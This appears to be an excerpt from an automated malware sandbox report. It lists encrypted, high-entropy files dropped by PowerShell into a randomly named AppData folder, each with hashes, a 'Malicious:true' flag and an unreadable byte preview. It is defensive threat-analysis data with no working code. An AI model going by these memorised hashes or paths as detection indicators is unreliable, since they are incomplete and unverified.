                                                                                                    Preview: .s...t.pm?..Lt.v..lh..."/.1.X..Qh.?D.L..Y...>..b...'I.a.C..iS.%i.h7.^ ..&..T5..Z9.A............l*.St.....M... ......z......6.......M.H........e.......Q.\....60...T.4.-.6p.%..+bU...z..C.;.wOCXe..qF.c5.>.v,.@.0@?E&..5....qN.,...)..5".%<.=.."..F...?T.<5Zjws..T.k........g..C......(..CH}..D.L$..d...1..>..D.f.e...,..=./0dEN...4.5|...@.BUb8.t$..d...yc.D..D...7.._.H.D....k];.@g...P;..d....S.Q.6...xR....{[...B.a.D..2.>@-"Tc.[..{q.d.~>DUZ}..{..h....7.....}.A....kJ.>gDz8.f3R.'b..@Q>C..P..c.=..H......od..-.2...5Jq....f.....t.\...I=...D.ToO. ..;1..K.%...,.....`.....>.s.m.0..... ....*gR(@..xx..KL..H[..jT..^.)Q..'U...U<..b.~...........r....~.D....@.v.....u.....b...Lh.,HnH8..).1.Z...J.!.v....1.{.z..J.(.j.Xh...h....Z.g.1ZuW..k;.o^c.<.."....v.S*..Q......`....}!....^...t!,N.u.OYI...QO.5..g1...>.B....{>.].,1=..?H...L.#Y.%..j86.b.l...b]..B..V9ib..d....0A.nO..x...[...x....O...).f.kk..HF.......{.....&W...A...#.#.o...t.....;3T8wF..E.H...pXB...5..V.h.g.Lv...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ARPWhfQocinEXVCa.DcNgqetOiJ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):89377
                                                                                                    Entropy (8bit):7.998346118330625
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:95cxxX4eOVw1Hbxl71DXs601By8QBNC8xFMDFGCq8m1:g74JVwpZs6iQ8QXfeGom1
                                                                                                    MD5:9EB0CE1F4FBA378A6A7E1A36F5D97B9D
                                                                                                    SHA1:68772056BA52F1DB9D5FA55AA6EF0A1FA8AFD09B
                                                                                                    SHA-256:84B97F9937374BB9258210A261E0F3433041102877536A944E1E85A3F4355AC9
                                                                                                    SHA-512:3F8A61919ADFDA441A1070622BB22FABDD34057F79E601F4946A42A7AE564EE8296E51EC25BF5FE1431C2613520274A2CF52F1CE62B005A4ECAED0AA5C5642B2
                                                                                                    Malicious:true
                                                                                                    Preview: ..=...M..._H.za...U......_......H.l.sU.r...._(.PzM.:.,.`v..^'...+....x.*;..+..d.o[[..S..FE.....4..Z.....t.4YK)....~m..&.B.g3..C...I.C....A4..R...S.1..d...I4o..._`T..}.........K.A..DX..P...(..S...]<...p....(4YX$.C$....Mw.Y...[...}..k.....(V6x.2x.W...?......o[....T..}..O."v..X-8... ..=........V..\%l.+.Fp.5p.._PG...N....N...G..>.S...K..C..w..]/....:R.RtGD/.)2l2.,.V...M.J.[.C....4..e.\.3.........1.?....Fx......pu.....'.l.O.X..P.-X...<..........B-.n......N.@.....b......p....Z..y..M..^O9.,.0H...*.E.y#........O..V..A1.\@z.A?;..}.fd..:...^.{H.BY..F....q.Q.Y..I..'.-rV............I....~....Y....t S....BU.....NY..!....Up[5...e.hj...../.......J.+R}.ehE.a.e...u_.o....~s..zU.{5..`98...i2....z.b...k.)...J.....6..O=t..av.r.....L..ca..d..9.yR.....*L..i.%..b...$.f1..@.....F.(.;...^...l}Xx}Vu.U.B.....rX......M~3..5.0.Q~.a..<.....T5......Jt.i.0.A...x^.z..A(..PVi*.I.../."...~...._...:l.....V.#H..7..q.Yn<Y..d[M.OZW[...G.lp....}#.MV.......b.gJ.J....%*z..od...A..eb|...y.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AWuIpnSbxmefzZ.iOLQcEGMqBSXN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):124750
                                                                                                    Entropy (8bit):7.99831789391062
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:BKSiYPB6lzUysCqWVWE1E65ZIg4lrZOKa:QlC6lzHsCqKjm6L2lrZOKa
                                                                                                    MD5:95D34A763AB2CE4F3FD0C33915628000
                                                                                                    SHA1:3D21BCE64B5FA85A3D93F4290076F00D11577883
                                                                                                    SHA-256:0DC7D157204DCE10543C864CF269FBA0A81DB6F2FE5522EDBBCACF0DAF9BA9A5
                                                                                                    SHA-512:FDEA4516B1EB516E240FA8C42B784AAFBE52F82DD07E777E8131CEDA9272E386F694B58E2DA1D2773307C7AFBBB515401F94747A3406D8C23C55951588021FA7
                                                                                                    Malicious:true
                                                                                                    Preview: ...*...$E.]...f<.nP.9g...d.]...M..Q.O...e_.dB.J<S]A%....L.Nk2.C0i.~........*yO..F..|...bL.j%......='...e....0.R......W.K.$5.u}....[..h..z.x.....|.`..9uW.@.{..NU..v.a..1....b..4Sot..;.......2.O". \#..=....aw,..G]4.8.`."]...?...ank..}6.8.H.Y..I.u.....$.)..a....C.6...IG'........N.J......T.......J....'S@....N..'.$..wQ./..[..%}0z.=.ZQ...@.[..%K.l.:.XF..R".......~w@..?......5...`C.".../@..+>./.....m.5.#9.....g.4..P|.]/..I....N,m..M........,...$..ZlN>=MQ".P..........6........M......h..H..}...LZ......'.O.a)_#...~E...0x..>].8.R.K..X.>.He..g.H......C.M...:YSN......V.V,..r=...{X.<.u....t.......:.......y.O..%e..~...w..g.E..:..s.y.....Q...O.`...g1..9..KP.34...J..Y._...%.!.Z.J...9k.i._3... :...m..SP2..I.S.rB.@....m....8.....VHM....V3.;{Wn....w7.....Sm.3.z.h.).?..@<..1t.!..-Co.c8L..].\...t.....6....=..LFA.7..7.H..,..Np...$Qc.8.N%}.........;...X?...5.^=...!.H._...*...d.!J.$.".<.#~...a.}......|A...\2.Q.yw.j....%.1[.j..BT_.T...Zp..-.K.M..c6.&...J.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AYQMbHDVCoyzOhLndP.ZCDMOyWhbvklRHpF
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):174505
                                                                                                    Entropy (8bit):7.998838250131159
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:T9r1c6R0NwxBlZCwEmjoj9mbA1De/rGfARAVfaK6w4AP6lKa:T9JN2wx4wEmjXbAMRAVfJ6B3Ka
                                                                                                    MD5:F2219461AE638DBD3AE2DD789ADFEC66
                                                                                                    SHA1:C747802AB2952727EE5E78386BA6E63F9C13ACAB
                                                                                                    SHA-256:377A8218759E05F7183BCEC90A7E7B8BAD1FAE9D7160634A955B5DB5463D5886
                                                                                                    SHA-512:C280685D592B9146EEFC4CBF74C21A481D2759CC3977332E17BAECCDB798E15E96AA289EE9924CE5BE7B8A5AD9FD9E55B850C3FFF5F1431B82DD6D8911E65264
                                                                                                    Malicious:true
                                                                                                    Preview: v!..2M..(-..le...R..PRx..w..".<H :c.e....Nt.uC#t.y..d#.w+.v...h.AL*'.....[...14.8...?....:.4H..3..M..A.........?].I...l.~.z.'....<.......@e....|.0g...B.+..d.N.I..u.`L..Xb=Y..2.{...........gYE...;v.f....'x..2.-u2.&..E.....=...Z.`.J.....E@!.5....X....~A......9;&E*'@!/.]..6..cv.T.J...}...Ji....|f..v.f....P,R#....]^T..........^.=.6.8..-f...?.#....O........8%!.H?SJ$NDv6@...f7....e.n.%..fIxu.........{..&ol`.=/.I.S.x.1N...H@....<...o......c;F!b......0..6....:<.j...;.......G&.yZ........s>...<).T........j.*(...i7..8=...(.V..._..o........9...a.....6U.s.).F.......y#./..O-.B..Z.....8..K...k.F.....|D....6....=.C....^B-..<.........../P...mm\.~[.'"j.:..^Zl...?.o.......V..@.....{O.%.......J...Fo.u.|....WF...[....Im.........".?0".....7.^.a.....k......~......#...8e......:3..ccu&?lA...YR..].b.l{RJ.....S.yK..vc..&Sm...q....ebV....E.U.b.u!N..~.....65..9...z..\...T...&s..8.H.Y.IHjX.J4..Q..(.......R.{...9I.mA.G'0@2.".i..@DeK./.@n<yl.........y..W~...u.9
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AmBuKsoidaTwgDcFe.QlMTbxijnHFgmJYK
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):101819
                                                                                                    Entropy (8bit):7.998211739295481
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:CIeu/3v94Fx3zPBzoe4S7GUqdLXso/Sof:t5316x3FzvUl8of
                                                                                                    MD5:228DD0E69680D0DA6DB29D3756D685ED
                                                                                                    SHA1:089F01E69B25E7B83976150536CD8BFB93C54238
                                                                                                    SHA-256:A310AD31A27A0032A94B19CAED8D861F7416447C9268140D5E362B496FCA575F
                                                                                                    SHA-512:DFF8884A4849D017C9AAC5E5278D58133C1C4022400C57F80026F7415D8EFAFF911403B7BA7E95813B60725129FC58C5CBB55FB5A1F85DB3A51BACF1E2156809
                                                                                                    Malicious:true
                                                                                                    Preview: .)/R..^.....A.....8.GbV]&P.d..k.j.oP&.8.`...2...kcf..H`...+.\.....*.....R,.D.C+....5...!^.|T..g..x.x...ZR.......r....q.%..c:.}VB..y.....Es8.B..*.<g7..?o.V.H..Y4...,.q..A.a8r. ..D@...':...CA%..ajZ'......DB.......D.F.........vX.wB.4./.n...2.............:......v.^..~....cYH.Qt...n..... .....T.O..HD...'.I.D.....M...uC...<.x.@..<J.........}..g......s..N.2.thT..Z..H......x.<...[p.k..v..miE[.kE.e\.oM..2g..5b..x...5g.[.(TF.h_J2=.%>.....aX'p....y..e:.%m.....U......6...q.I...........AU..Y..x.....P.%W.8em#..CF..a..{7....;~.?._.. r(q...O{.T...s6..d...[.<....-Z...&.s.0...=X.(.i(..}..(5.]..M......(.......j.\._...K.Wz.]K....;4..^n....eP,.b-Hc...\OwmE.=x.n7...z...8.....i*.</..........]b..%-2|..wBb.-5o^.....H...e.O..s..~e..7..U..M...o.....`9]gu.tQ..z......l...p..&.......,.cCk.N..............}.i...A......aiy...V.K..&$Z.i..k.z}....D.J6...`(....[..:.%..4.& ........W....V..2k]....C...F..#...ry<.%...:%.......}a..\..I#.G....T.J..8...CO.m..F.NZ..O|..&....&.zc....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AmuPvBJXSECTxI.BTSKVizGswAe
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):114134
                                                                                                    Entropy (8bit):7.998241565146813
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:E1GLZ140QlRnisVMAXRvBkEFhLsxma0JOa6rmopDaJ/V7+nLq0+q:DZ140QrtMAVBlhLsUa0JADaJtgLqY
                                                                                                    MD5:3664B09DFFBF2A1358A38D34F3A669F1
                                                                                                    SHA1:176F87F27B6392BF06AF6E4B276F488B5B6D6B39
                                                                                                    SHA-256:D72BCEF17DB8E3CE6EA6696DBCC83A932ECAA55192AA10C8415FD3A359EE22F0
                                                                                                    SHA-512:0AD4452FDF76A1B11E449AC887DE1834443FCCA46E601210941C43BB5D557DB022694D3CEC8E1B91EA4146111DBB0FA2E7BBEE031EA6B8E3996DA73730A660BF
                                                                                                    Malicious:true
                                                                                                    Preview: .u.....nJ..I.&n.{.o..-..(....Sy...L......X(Y.......Uo+..EJ..MG.CY".....F9S;.H...z..w.d.#c..=dm.....?.7......e.p./....E...byd.....HH.G.C}.\.s..f(....9H.LF1...Z.,"..(.......1i..QI.8-.Y*....ne.=.P....B&../.........0..8j.-1.'..#G....JQ.._...3.N...~..[^.(..T...rP.3...u.i...........:R.ss!~.r...PB\_X..'s..~..1.r.(u.......l.....yV..?+.~.1.H.........,...0].#.Q.{;3.,...~;...|Q.T_....V....%JV.tjN.Y.........Y.n..v.O.....\....EW.m...'.[;....a..8....=.. ...u......2|..N...N'.................xkdh...\K.d.......V.`..V.F.Y.O6x.91..M..k.#f.......6...\..B....-....It..e..a...h...~.Ad!K&.V.Dg.8...gp....#>..k..d%..X[.[#i`. "..i..K...d.pA..l.A........~.M>...@.P.A..6H............G).."....@.....g..m....x.t..&........T...&........Q.1.....J).O.^.j....x........my....g....x...q.zp&.K?....1.K.b+L..=z....K..nB.."C7..":....6...SL..N4...#.....j..0).*jS.\+k...7.2.}.r..P..F.~M4 ..?(.i*....fW.os^.WI.....e..)..L..SDtPFR.jh..E.........LN......../^*..r.oS...JE>..2o....%<B=...,..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AxjvQIoklqwZJTBFcb.tesRTCpyOzdQx
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):78856
                                                                                                    Entropy (8bit):7.997452921999763
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:tCrAgp4AojWbi5k9LzHwZSsIUdIvdliSBfitORmrOiNxIffcQX3:crpSCT+/d8iSZick6iNSfpX3
                                                                                                    MD5:63F93C86A6C16091F9265ECBA7EC3BCD
                                                                                                    SHA1:74CD0A364D33305419779C587BA5112A3C5A6CCF
                                                                                                    SHA-256:7515A4934D25C2750D0A82856484F633BDB69466E1BA0FE1EB4399EBD0CD27F3
                                                                                                    SHA-512:2574EE592B9A466ED02BAEA640C5436072165841C6B60069EF1DFD359B8E26BD9754F40B851497423622A6E1A48B9784170EB9D79E748EA1AA5CB79D8515A68B
                                                                                                    Malicious:true
                                                                                                    Preview: oA.>...K..=%..<GSGv...fW.J......-.c....2...C..,...V......i9;v....\.Q|...d..0oF..).[Q:.C ...J|Fu.?;\ .w..K...^".0M....!F.[.5...v.i..N...?]V.w..I./._....N.3BWec..?y.a.D..Xh2.v./.\{..2Y..X`C.....&}7#k....d.[........`2.....Sw.r...Bu.......a.i...r.P.9.y..d.F..4.P....=E.5...rpIq..a[H..h.,.<...,......X.....IS<.{..~.G...@.....r.W.s.P.P2.....!L2+*S..^....0.....V..u.|B,.Y...L....0..6.L....H..Ck....gD.^...7....`%..a.;z.D..s..U.7.S>.....Y0jH.d.yz.PK30...".%...AV..c.k\"1.+..xk#..+u.....4&....g/(..E...I......V.....<..>.[E..h....i....+.zY.@;..z)....2-.......B...M...`eEzd^.u.?.!7.S;..S...L..)...f..C...oS.sk!p.|...`T.}-...u$..'.ug.4&...,U.w&....u..{.n...x.....|.....NT..(KT....c.y...^A.""x..}.qn.).kO}VF;.C....6.v....Q..2..mL..r...b3.G.....6......nR..!...L..M"h..}.B..j.t....I.d.O.1.....Y...3.....4...c.. .......7....,....A...Mp.0..PIM.......LX.....,...U.!.4..Y.L..2T._6(...(..K...r.\.zuGs..d..e...;.a.+.49.'[:.IU\.r....3'c.^...{.6..1IF<.K..T..........
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BDApiSCOqv.dNxUVZSbDsIpYt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):179525
                                                                                                    Entropy (8bit):7.999035723945852
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:El3Raj4KmqOVWGT6KQSESCp2pr9gIIgYQZAserqLxQdryKHrsK6rDde2T85ZIbd4:c3R24KhOBpE6ZWIIgYQZAs8IAr7sbRfy
                                                                                                    MD5:7C1CF5DC0B40CC48C3AAFD789CCDA23C
                                                                                                    SHA1:5C6B50FF6650AE9E3CCB321B65713CE94980074E
                                                                                                    SHA-256:9B32CDDF654A32A802C9BF96B6D6179ED19D17A84FB3CF9AB47476BD3084AC5F
                                                                                                    SHA-512:04890214C550B0201DB1A9B4442868B9399253DFD4D44E05E3A8C7CCCA52796CD8CB17CAADA907975EA27A6FD4210D102BE7BCC03D7E837A081CDF920C603145
                                                                                                    Malicious:true
                                                                                                    Preview: ...E......v......d...9:..d.kX.=. ..Z.E..z...%k..4[./..3.i3a:.%s....>.y..._.'6.=..6....=......U.?@g.....b.6.}X3G#.g.v...F<'..........V...]z.........f#-.d....P..[xap=....?[.:}.1g....V...j ..5....)B.N.....'.xQ...0._.q..h....dZ..DSH......l|0A.:.n..k:.%mA..:.1..6......IKuy.W7t.hy{_?%....E...<.......m........$..a.%...Mc.tr9...>.....rm...<\....."..D.V\..X.n.fD..........:.j^..U..|.[..Xb[.Up... h....&..3..B,...v.U..M....=...D.t>9.w....(.E.5..l.pHa0.w.+m..$....~.g.....$..Q..l.....l.L}.qB.*mGF%.....Z..+..Pmj..-..`....). j[U.sCg...K.'.b.`....(?.e.?+J.....w.9..)...>p.9.v.."%.-B....<.G..Q...M....%..6.0.U..w..5.om.%.+.X.B...qnrK.3...n".wL.6.........i.Y.4..u,#t.....R>.oZ.a=..]...e.rU{........5.HS.vb...N.e.....J.d%j.... ....Z...z4.J.$........st&`".^.I.H|J.]..}Q.aB...r(.........!M...Pq.=....o..1b.!..w...Z.;.|.y\.y.s7Y...X.~...~Aw.....k...8?.^0k.5...b%.-.]..>....B|_.r..a.fwJfV.P.O....bY.*.;..tB.]..!Y;.`f..I...vtm.Q....G..F..5..g#/n..`H.....r.L....e..N..|....'x..\.`
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BKnRcQXSWtl.BpuPTZdbXyvxcSsVKI
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):120061
                                                                                                    Entropy (8bit):7.998499843037823
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:vjRDyXoc09emmdC2FSTw2jfoqMHFB5vmnq3:vjRWXUcdCCSHjfonFfvmi
                                                                                                    MD5:29920A2EFDE3E231557989164C08C2F0
                                                                                                    SHA1:067ACDEEF8377793148B30373952AC13FF993765
                                                                                                    SHA-256:3C9699228901EEB76CEFBF59A27A412C372311EC2AAD732F68DD1FCA3225D616
                                                                                                    SHA-512:986BDD9FE3648883060415275244E599EDA2C351731573291881A8BAB475119F3F9B37FC8D2C068F4E3F91CA45C4F558A79DC6BB1918118F36FAF6FFB7CD6EBD
                                                                                                    Malicious:true
                                                                                                    Preview: .....w..mNM.w..^T.c.......Lw.fq/......o.)c1....Ax.m9..:..h...oG..:...u.>\...?.m..$..n..H.f..{......4....1-5f.....v..\a....}Y...s.r.....r@..{..d....K...B.l...#....1.{.GP...u..q..\....!....k.._P.........L..H.L..V'.....~t..,.$....v......O......)..1...L...\...s.x.H[..&."3.....^$...d.?...-....E..........=.M......4bA../.s.j^#~..x.v.V..z.M'.'......DM....gz00....y%..o.U.o....g.``...+.t...dJ.3..@F};.S..].Y|O...../..N.......<fy.l.pM..g}o.....Q.y.t5.i.7x......~G)...Q8..]..E<..`.w.Ks.B.........'.-.;.....3...KZ..2..k.Xc...11..x&2...Zu(.aQ..v?E...~..E...F....y..c...y3.p........J..HpB...].@.\Qj.]..VFK4Q.>Y.W.....z.!0....h_Z...H.j......EU...lD@.8..P..)F..E......w.f......#..|(W....[whF-..Q..T.x.../(.uu.........z(x.j.h.\7.0..Cq...(k....d..[..4.{+:.p....gD*.j7*.P.g.......|O.'..6.l.Z..j<VXpOf1.o%.l.e..$...*.H.OQ.C.U.No...+_......7..B..V..?$.T!.e...q..e.....s.^8r..L0...].ns.9.a...d89..c......Y..5.U...c.Y'..C...q...,...........~.e-O-..;&.nW.<{..+..O..i\.h..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BSfdGNVoFyzKtrPQapL.PwQzJyxCGBNAlbVehc
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):124192
                                                                                                    Entropy (8bit):7.998657721121981
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:0OfhpY6Kyb+nyC/h46meA+z+TjRZEawMu7:BQty6yFpev+xZEawl
                                                                                                    MD5:CD1A6FEDD59D0654DDC275CD88D5379B
                                                                                                    SHA1:F332D99C9C2E219BB14BEED3911636AEBA9976E9
                                                                                                    SHA-256:135F759DC7AD0E362DAF28CA7448B8F3B18035B7F5A1FBB8C72AA379A13A5882
                                                                                                    SHA-512:94A34B56F9DAD333DC1091FA09F1EF6C6A51F8D84C45C751863C136556F52D4B8B2FD8CDA83BA79A88D5CFAB6A184FB61E9014E8968535B530B85B3B40FF6D86
                                                                                                    Malicious:true
                                                                                                    Preview: S... &...P.....;.....<.a..|...E.l..j@.i*.....lx.y...|.G..?m.k.Yg.O.2.n.!...z./L..h>H........_....;.........~..!...y.....=.n/....L../.4..V...v..k...a.Z.w.M......2Rs..w.j.....~...fl/)..z..O...DFD.|z...ba.._..A...Pd.(.8r...&..gv.N.H.@.u....ac......A..A}...<v.d..a?....6a3KX.P...[s.A.S.y6...P..1^.....?..#z.%......T....0V....&.M=..a4.6...SZ......k.-.g..e..2..y.../......28t..bh+J3.Y.*.&....UPC4....).z._/........9p.5...[-...1Y.zP!"g.....,.W.y..}..EzV...Gh......./.w.j...w..:n.^U.....H.,H.#AZ.D ..|I..N;....H..W{.Q.....J...w4...+...Pur.....K..@..I.u#.z.qhUK..<....B+.....F...;..U^.T..s....y.q..3.|e..8....N..-..=....af....anq....@.&....%..:...4.;p.....+?7......no.z..).A.....=..[..A..I.>K|..6mZ...%h.../^XF..J.A.........B....=...}.S...&...%.x.U).,...Z.I.R...b.......;....AL*.s....."...c..H..Y..p..(.D...(.G.Q........Q...).;..........:..u0...M#S.b.D/.'.!..?E..]....t.B..Y......,.E.....MRY.n5..=\...^...;2.........$.xWOm.q}_A..K...O..zg...O.....7Kx....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BSjgNxXywaEUizpAM.TdmaLypxJivWSOF
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):174322
                                                                                                    Entropy (8bit):7.99894621691302
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:vm27QcZ0QCJd4MmCA25AmVyGPhodqKb36xz/iMt0h/j0LjSZLupfch0ogRPr:e2EcmQi4T125A+yG5YLkjiM8GSRupEhS
                                                                                                    MD5:B87190663519C1E8D35762FDACB612DF
                                                                                                    SHA1:41C993F15F4BBE14F2DA7B9630F1C3D386FCF067
                                                                                                    SHA-256:2C995B6F4A179AA29B0A8EE55253D7E4D31999D9F9D35BD87637CDF405A34A99
                                                                                                    SHA-512:CE0F2C30BA28B841BCB11A5F77BC5F994ACDAEACD862A946AB2EDA61D9D8C74F17A1B5229CB830EEBDC378D6863F72CC987DA6684A92E327EE77082E54942751
                                                                                                    Malicious:true
                                                                                                    Preview: {..).Q..&.;.(v*.s..J..........uZ....`.&.6l.'.........b}...k.HpX%....#.."..q.. ,M......n.D/..#b.[...Y.nJmy..B..Jk......>.......Y....s.b.Y.h...j,-P4(.>F;.o@..z<hzL.,o!..y6ON.6z.u.....kV.........>..y..O...8.<......T].....nW.O.{.c..C4GA......Fk,.gj.V.A..y.2.......<d\z.....9..*..|y..x..._..:..m.3.....Y4D.]..v..@|V.......b`~...z..).3.?#.`.,..Y...-;.i.w....I^...H.,.L..j.w.v.*.I.D....!.;.TD.#.\....g....H...}..~I.%..yz.NB.u.....K^[.8.... ..S...7..Dp..:p.[......#l........w...)........^c53....6..U.Q.............o[..V.kZ..zA.P....c...:............`.<7.J.H?M9..Fi.<..=U.....P.4.>B.x..,..;..C.+.V...n.o.5}z....O.A...7.$!.d........b#....nI...(...:....L~..^...D.,*...W.^sMY<(.{...i..m.C.........yk-.9.cB.$.#.Cp./....<x-....DIX...;f./.=+...0...=3.a.........}..u.[....... ........i......h..o..CQ.>$|3u..?u........q~....XUnzZ.V._g..T..*.I{....F.. ....p.. rR.\6.J..%...T.S8...z4.,5..]!g.y{......l.I....}MN7./...?c&-...(..}..9.2a..."....0.I....T....a.~...{.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BTXVNigKFQClxroRqaO.wgEMARZjpGPJuSCyod
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):155893
                                                                                                    Entropy (8bit):7.9987071357426
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:QaCMq9vgTyje7g9l6MIKJHC7SRO+j1CpM/W3vpdFswzTMyv9PdwwFEkA:Q94TyjFHTIKJHLP1yZ58ybwwFe
                                                                                                    MD5:88F82E3F0343A9A0C36F7F39878B2C69
                                                                                                    SHA1:0277BDAD1B99EAA6AB286E828C0594C9F8A109C5
                                                                                                    SHA-256:46BB39529C8EF2DB3ED2CA78E6D71922532DCACBEC220B4F9C9B7546D1620445
                                                                                                    SHA-512:0E56D18770DB3A5167999315C8A698DFBF797048A3EE1A60AD90596074FB612298B019DE2F5975B4CB057B83E9B9708F0F0D44B30D5A77665B8A9965D074866A
                                                                                                    Malicious:true
                                                                                                    Preview: .O.]....../LH....26..:....#...m....U.^..v.kP....(.98I..a..;..w*.<q.f#`(.O..H..Z.4|........eA.6R......;.|.'.;..........X.....2.m...$.F.8.T.#.....+....*..&..1.....h s...$5 ...j.7.C9.m'..3O#.v.u...$..(......)..Zu>M.8...;.s...A.g..^v]..8..f..D\:..'....E.a.rw.a../.g...1r..ux../2T...cO.L1.(g..'"G..W.W..........@"..8D.j..Y....R1...=....M..d.`.. b......_*.r.J.h...%3.Fr.vlM.+.%..."...dWCU...Qd.NY5...W.CgvmW.4B...Zy.@......$..S....Z._t..U .+.w.N..s....G..Re.c........M....Z...6..?......".-.....xH/.7%@4b.Jc..h...OeK....2+.....N.5.....y.|...})......X|"...+..7B.0o...*6..Dp{...;.c.$.8.{.M....o..v.!.n....L@.Ft.k..z......1....t.....;'......y.<..{|.M2:X...g.....s,..}.j..B.A....y"x.....7.xZ&@.......!.K{....r....T.E.K..M..nc.P;pRWu..V..#.F ....=..VA.s...~....;.. ..Oy.....d.C...&.c./...L.9....pf./.."...wF...T.z..tt.i,&W..7X1.9..7\u ..5!..75l..3..0bF...m..w...fR...b...b.a."|.%%...Nw.f......'...^........K3PR...]........._?9.?.T1S..q.....g..k..ns.U;.....{[
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BVKszQfclvtGPJCoF.pSkYKXlrvO
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):144839
                                                                                                    Entropy (8bit):7.998585272997836
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:fCksbePqeHuGrbNP6Zy9bkS35FraG8yHDVUkT6W51dDPuQ6o2i4i:KEqeHuEbN6Ybh3jrQ8zT6+1dDmQnn
                                                                                                    MD5:5CB0DDEA69545A658EB748B2975079BE
                                                                                                    SHA1:BC4241FEA3808D0BA095C47659E1A9D155D64049
                                                                                                    SHA-256:DEB8B541A72BB449824A863018F18C906EFBB11120F82EF1FC03B0A66DE14D68
                                                                                                    SHA-512:67F233E7783F0285F9F437088C836FDD94BFAB3E2C07E497EE25B1A06FBCDAC33F8D6D57C28CA6993BCF68605D989CF0CB25C8B688BDCB3E9CEAC97FD8D27A30
                                                                                                    Malicious:true
                                                                                                    Preview: ~..XgX.u.dn......u.S...6..v@.....\..S<..5...R..........+.1H..G.f...X0=.9)_.$...p..w.f.O^z..".......|.Bh.P.n.L.5.?..}f.$.F.l.@5._.KM.K...y.35..n......t..f."w..|9..AQ....{~.![..*.....@X"z_.....Z?.Y....:..I....w...6x......]E'oc..a..P..m.).......E..^m.R.FM.k].$..0..4^..a....NfC)......M.........-.<...i...5:......DI<.T...yu...... p......._...{.l.`.`$.)*.].w.sV,tn....l0TJN...x.....X.....Hz$p,.....Y...RvV....w_..q.5.c.......Y..CD...#|f.s.*.22..! j,..y'...gz..Q2.L..NI...[..h.w......Z.g.0..C.............R.U..=.x...~.c5...~.......=....i..D..VP.g.!mE.sf;....k.. M.;.%.....9.pMl~Rp]............y.K.<.0..u.(n.4.Ra.H,cZy..L'.oR.g.3.4.U.a.........S.Lr..Xn..0.........D^n...R..j.A...#C..dp..[.S.>..#...b.pU..k,.....`R{t-B).f.....e.0.D.....Do..1.).y....;....p<.i"........l1....V..I.b.[G...;.Q.L..'..A..ub...$.w....Ls1.....gE...../.......n.B./........'D8C.0...[P.G..7..Y1..x....\..C<..YS.,.q...5.`..J4.7..^.."._...p@...So..,.B,]....)..q[...I[.R.6). *@fr-..2.....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BbwTNlIovWfKFLhU.WpXZEviAhJnHPfwlRDM
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):99489
                                                                                                    Entropy (8bit):7.998005719627676
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:I4ATtZrzwmeRn61pjWL8uEqnSn1Y82c+pH8AcEvv7w0FjwnD2exR0cKiSh1kB2i6:mtNzOlejWJS146Yv7w0K9BKiSb02iLun
                                                                                                    MD5:0D2AE9298FCA90ACEF84DF151A6D4A60
